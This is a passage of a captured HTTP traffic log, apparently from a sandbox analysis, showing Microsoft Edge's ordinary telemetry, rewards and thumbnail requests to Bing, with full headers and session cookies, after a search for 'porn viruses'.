ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHHPGUSR=SRCHLANG=en&HV=1728144330

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144330.184e64e7
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /fd/ls/lsp.aspx? HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 363
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHHPGUSR=SRCHLANG=en&HV=1728144330

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144330.184e83e9
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22}]

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22}] HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHHPGUSR=SRCHLANG=en&HV=1728144330&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144332.184e85fa
POST

https://www.bing.com/rewardsapp/ncheader?ver=50184609&IID=SERP.5051&IG=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /rewardsapp/ncheader?ver=50184609&IID=SERP.5051&IG=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 4
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0

Response

HTTP/1.1 200 OK

Content-Length: 842
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate
Content-Encoding: gzip
Expires: -1
Pragma: no-cache
Vary: Accept-Encoding
X-EventID: 670163cc295c4652a661e1d0f91d3577
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-OMdXSx77+LmNwOVpb+JGzjjSHmATqXjC8aMPB9TUy+U='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-Ceto-ref: 670163cc295c4652a661e1d0f91d3577|AFD:670163cc295c4652a661e1d0f91d3577|2024-10-05T16:05:32.816Z
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Set-Cookie: _C_ETH=1; domain=.bing.com; path=/; secure; httponly
Set-Cookie: _C_Auth=
Set-Cookie: SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:32 GMT; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144332.184e9371
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.BM%22,%22FID%22:%22CI%22,%22Name%22:%22HV%22}]

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.BM%22,%22FID%22:%22CI%22,%22Name%22:%22HV%22}] HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144333.184e9463
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}] HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144333.184e95ad
GET

https://www.bing.com/th?id=OSK.5725b4c466ca3726e7a6df52730dacd2&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.5725b4c466ca3726e7a6df52730dacd2&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 4450
Date: Sat, 05 Oct 2024 16:05:37 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144337.184e9728
GET

https://www.bing.com/th?id=OSK.4b3edcfa1422114f11e29d94be9f0544&w=120&h=120&c=6&p=0&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.4b3edcfa1422114f11e29d94be9f0544&w=120&h=120&c=6&p=0&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 4344
Date: Sat, 05 Oct 2024 16:05:38 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144338.184eb66d
GET

https://www.bing.com/th?id=OSK.2d7b7af86f9a55648a4aec7fbe3969e6&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.2d7b7af86f9a55648a4aec7fbe3969e6&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
